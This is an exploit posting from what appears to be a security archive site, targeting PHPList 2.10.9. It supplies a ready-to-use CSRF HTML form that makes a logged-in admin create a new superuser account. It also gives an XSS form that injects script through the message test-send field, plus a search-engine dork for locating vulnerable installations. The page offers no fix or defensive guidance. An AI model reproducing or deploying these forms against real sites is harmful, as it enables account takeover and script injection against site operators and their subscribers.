PHPList 2.10.9 Cross Site Request Forgery / Cross Site Scripting

PHPList 2.10.9 Cross Site Request Forgery / Cross Site Scripting: Posted Jan 26, 2012; Authored by Cyber-Crystal; PHPList version 2.10.9 suffers from cross site request forgery and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; MD5 | 726c71ca324760d3587aca15a71455d3; Download | Favorite | Comments (0)

PHPList 2.10.9 Cross Site Request Forgery / Cross Site Scripting

+-------------------------------------------------------------------------+
# Exploit Title : phplist - version 2.10.9 CSRF/XSS Vulnerability
# version       : 2.10.9                                                                                                                          
# Author        : Cyber-Crystal                                             
# Date          : n/a  
# Dork          : inurl:"powered by phplist - version 2.10.9"
# Software Link : http://www.phplist.com/                                                                                 
+-------------------------------------------------------------------------+
 
+---+[CSRF Add Admin Acuonnt by Cyber-Crystal]+---+
<html>
<title>[#] Exploit [#]</title>
<body>
<form method="POST" name="form2" action="http://localhost/lists/admin/?page=admin&start=">
<input type="hidden" name="id" value="0"/>
<input type="hidden" name="loginname" value="root"/>
<input type="hidden" name="email" value="ss@ss.com"/>
<input type="hidden" name="password" value="toor"/>
<input type="hidden" name="superuser" value="1"/>
<input type="hidden" name="disabled" value=""/>
<input type="hidden" name="cbattribute[]" value="1"/>
<input type="hidden" name="attribute[1]" value="Checked"/>
<input type="hidden" name="change" value="Save Changes"/>
 
<input type="submit" value="exploit" />
</form>
</body>
</html>
 
+---+[XSS Send post ]+---+
<html>
<title>[#] Exploit [#]</title>
<body>
<form method=post action="http://localhost/lists/admin/?page=send&id=1&tab=Format" name="sendmessageform">
<input type=hidden name="workaround_fck_bug" value="1">
<input type=hidden name="htmlformatted" value="auto">
<input type=submit name=sendtest value="Exploit">
<input type=text name="testtarget" size=40 value='[XSS HERE]'>
<input type=hidden name=id value=7>
<input type=hidden name=status value="draft">
<input type=hidden name=expand value="0">
</form>
</body>
</html>
 
#-----------------------------------#
|  by Cyber-Crystal                 |
|                                   |
|  Mail : Cyb3r.Crystal@Gmail.com   |
|  Home // www.v4-team.com/cc       |
|                                   |
#-----------------------------------#
Greetz 2 : Secure-x41 | Fox Hacker | Or4nG.M4n | SadHacker | Mr.Black | Red Virus | aBu.HaLiL501 | T7 | Sniper_IRaq || # All Man 0_0
 
 
 
# the End

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Red Hat 75 files
Ubuntu 38 files
Sony 34 files
Debian 27 files
Tipping Point 22 files
Th4 MasK 18 files
tempe_mendoan 18 files
the_cyber_nuxbie 18 files
KedAns-Dz 15 files
HP 14 files

File Archives

Systems

AIX (345)
Apple (932)
BSD (302)
Cisco (1,186)
Debian (3,669)
Fedora (1,660)
FreeBSD (1,021)
Gentoo (2,387)
HPUX (659)
iPhone (93)
IRIX (217)
Juniper (58)
Linux (19,899)
Mac OS X (399)
Mandriva (2,144)
NetBSD (234)
OpenBSD (413)
RedHat (2,297)
Slackware (378)
Solaris (1,462)
SUSE (1,144)
Ubuntu (2,560)
UNIX (6,783)
UnixWare (145)
Windows (3,961)
Other

PHPList 2.10.9 Cross Site Request Forgery / Cross Site Scripting

PHPList 2.10.9 Cross Site Request Forgery / Cross Site Scripting

Comments

File Archive:

February 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHPList 2.10.9 Cross Site Request Forgery / Cross Site Scripting

Share This

PHPList 2.10.9 Cross Site Request Forgery / Cross Site Scripting

Comments

File Archive:

February 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems